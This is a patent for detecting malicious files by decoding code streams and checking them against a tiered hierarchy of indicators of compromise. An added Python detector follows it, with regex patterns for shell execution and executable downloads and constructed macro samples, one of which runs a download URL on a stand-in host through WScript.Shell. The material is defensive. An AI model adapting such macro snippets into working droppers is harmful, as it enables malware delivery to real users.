Detection and remediation of potentially malicious files
First Claim
1. A method comprising:
- obtaining a potentially malicious file;
- decoding the file to identify one or more code streams;
- processing each of the identified code streams to determine the presence of respective ones of a set of indicators of compromise;
- determining whether the file is malicious based at least in part on the presence of one or more of the indicators of compromise in the code streams; and
- modifying access by a given client device to the file responsive to determining that the file is malicious;
- wherein the set of indicators of compromise are arranged in a hierarchy from one or more relatively benign indicators of compromise to one or more relatively malicious indicators of compromise;
- wherein processing each of the identified code streams to determine the presence of respective ones of the set of indicators of compromise comprises checking for the presence of respective ones of the set of indicators in an order determined based at least in part on the hierarchy; and
- wherein the method is performed by at least one processing device comprising a processor coupled to a memory.
Abstract
A method comprises obtaining a potentially malicious file, decoding the file to identify one or more code streams, processing each of the identified code streams to determine the presence of respective ones of a set of indicators of compromise, determining whether the file is malicious based on the presence of one or more of the indicators of compromise in the code streams, and modifying access by a given client device to the file responsive to determining that the file is malicious.
20 Claims
1. A method comprising: (independent claim, reproduced in full under First Claim above; dependent claims 2 through 14, 19 and 20)
15. A computer program product comprising a non-transitory processor-readable storage medium having stored therein program code of one or more software programs, wherein the program code when executed by a processing device causes the processing device:
- to obtain a potentially malicious file;
- to decode the file to identify one or more code streams;
- to process each of the identified code streams to determine the presence of respective ones of a set of indicators of compromise;
- to determine whether the file is malicious based at least in part on the presence of one or more of the indicators of compromise in the code streams; and
- to modify access by a given client device to the file responsive to determining that the file is malicious;
- wherein the set of indicators of compromise are arranged in a hierarchy from one or more relatively benign indicators of compromise to one or more relatively malicious indicators of compromise; and
- wherein processing each of the identified code streams to determine the presence of respective ones of the set of indicators of compromise comprises checking for the presence of respective ones of the set of indicators in an order determined based at least in part on the hierarchy.
Dependent claim: 16.
17. An apparatus comprising:
- a processing device comprising a processor coupled to a memory, the processing device being configured:
- to obtain a potentially malicious file;
- to decode the file to identify one or more code streams;
- to process each of the identified code streams to determine the presence of respective ones of a set of indicators of compromise;
- to determine whether the file is malicious based at least in part on the presence of one or more of the indicators of compromise in the code streams; and
- to modify access by a given client device to the file responsive to determining that the file is malicious;
- wherein the set of indicators of compromise are arranged in a hierarchy from one or more relatively benign indicators of compromise to one or more relatively malicious indicators of compromise; and
- wherein processing each of the identified code streams to determine the presence of respective ones of the set of indicators of compromise comprises checking for the presence of respective ones of the set of indicators in an order determined based at least in part on the hierarchy.
Dependent claim: 18.
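The claims above describe the pipeline abstractly: decode a file into code streams, check each stream against an indicator set that is ordered from benign to malicious, decide maliciousness from the hits, and change the client's access to the file. The following Python is an added illustration of that pipeline and is not the patent's own implementation. Everything specific in it is an assumption: the container format (lines prefixed `stream:` carrying base64-encoded code), the three-tier hierarchy, the regex indicators and their names, the scan direction (most malicious tier first so a decisive hit ends the scan early), and the verdict rule (one malicious-tier hit, or two suspicious-tier hits in one stream). The sample streams are constructed macro-style snippets used only as detector input.

```python
import base64
import re
from enum import IntEnum
from typing import Dict, List, Tuple

# Constructed container format (an assumption for this example, not a real
# document format): every line starting with "stream:" carries one
# base64-encoded code stream.
STREAM_PREFIX = b"stream:"


class Tier(IntEnum):
    """Position in the indicator hierarchy, benign to malicious."""
    BENIGN = 1
    SUSPICIOUS = 2
    MALICIOUS = 3


# Indicator set arranged as a hierarchy. Names and patterns are constructed
# for illustration; a deployment would load its own maintained indicators.
IOC_HIERARCHY: Dict[Tier, List[Tuple[str, str]]] = {
    Tier.BENIGN: [
        ("auto-run entry point", r"\b(AutoOpen|Document_Open)\b"),
        ("long base64 literal", r"[A-Za-z0-9+/]{40,}={0,2}"),
    ],
    Tier.SUSPICIOUS: [
        ("COM object creation", r"\bCreateObject\s*\("),
        ("character-code string building", r"\bChr\s*\(\s*\d+\s*\)\s*&"),
    ],
    Tier.MALICIOUS: [
        ("shell execution", r"\b(Shell|WScript\.Shell)\b"),
        ("download of an executable", r"https?://\S+\.(exe|dll|ps1)\b"),
    ],
}

Hit = Tuple[Tier, str]


def decode_streams(blob: bytes) -> List[str]:
    """Decode the container and return each embedded code stream as text."""
    streams: List[str] = []
    for line in blob.splitlines():
        if not line.startswith(STREAM_PREFIX):
            continue
        try:
            raw = base64.b64decode(line[len(STREAM_PREFIX):], validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue  # an undecodable stream is skipped, never trusted
        streams.append(raw.decode("utf-8", errors="replace"))
    return streams


def scan_stream(code: str, stop_tier: Tier = Tier.MALICIOUS) -> List[Hit]:
    """Check indicators in an order derived from the hierarchy: tiers are
    visited from most to least malicious, and a hit at or above stop_tier
    ends the scan before the weaker tiers are evaluated."""
    hits: List[Hit] = []
    for tier in sorted(IOC_HIERARCHY, reverse=True):
        for name, pattern in IOC_HIERARCHY[tier]:
            if re.search(pattern, code):
                hits.append((tier, name))
        if hits and tier >= stop_tier:
            break
    return hits


def classify(blob: bytes) -> Tuple[bool, List[List[Hit]]]:
    """Assumed verdict rule: one MALICIOUS-tier hit, or two or more
    SUSPICIOUS-tier hits within a single stream, marks the file malicious."""
    reports = [scan_stream(code) for code in decode_streams(blob)]
    malicious = any(
        any(tier == Tier.MALICIOUS for tier, _ in hits)
        or sum(1 for tier, _ in hits if tier == Tier.SUSPICIOUS) >= 2
        for hits in reports
    )
    return malicious, reports


def access_decision(blob: bytes) -> str:
    """Map the verdict to the access change applied for the client device."""
    malicious, _ = classify(blob)
    return "quarantine" if malicious else "allow"


def build_sample_file(streams: List[str]) -> bytes:
    """Build a constructed container holding the given code streams."""
    lines = [b"header: constructed sample container"]
    lines += [STREAM_PREFIX + base64.b64encode(s.encode("utf-8")) for s in streams]
    return b"\n".join(lines)


# Constructed sample streams (detector input only).
BENIGN_STREAM = 'Sub Document_Open()\n    MsgBox "hello"\nEnd Sub'
SUSPICIOUS_STREAM = 'x = Chr(72) & Chr(105)\nSet fso = CreateObject("Scripting.FileSystemObject")'
MALICIOUS_STREAM = (
    'Sub AutoOpen()\n'
    '    Set sh = CreateObject("WScript.Shell")\n'
    '    sh.Run "http://example.invalid/payload.exe"\n'
    'End Sub'
)
```

Calling `classify(build_sample_file([BENIGN_STREAM, MALICIOUS_STREAM]))` returns a malicious verdict whose report for the second stream lists only the two malicious-tier hits: because the scan stops at the top tier, the `CreateObject` and `AutoOpen` indicators in that stream are never evaluated, which is the practical effect of ordering the checks by the hierarchy. The suspicious-only stream reaches the verdict threshold through its two mid-tier hits instead, and `access_decision` turns either outcome into the access change the client device sees.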